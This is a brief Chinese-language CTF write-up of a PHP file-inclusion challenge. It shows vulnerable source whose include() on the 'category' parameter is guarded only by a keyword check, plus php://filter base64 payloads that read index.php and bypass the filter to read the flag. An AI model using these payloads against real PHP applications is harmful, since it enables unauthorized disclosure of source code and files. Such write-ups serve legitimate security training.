有get传参的点,疑似文件包含
尝试:php://filter/convert.base64-encode/resource=index.php
报错了
他这里有两个后缀,我们去掉一个
得到源码
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
传入的category参数必须有woofers或者meowers或者index
payload:
?category=php://filter/convert.base64-encode/index/resource=flag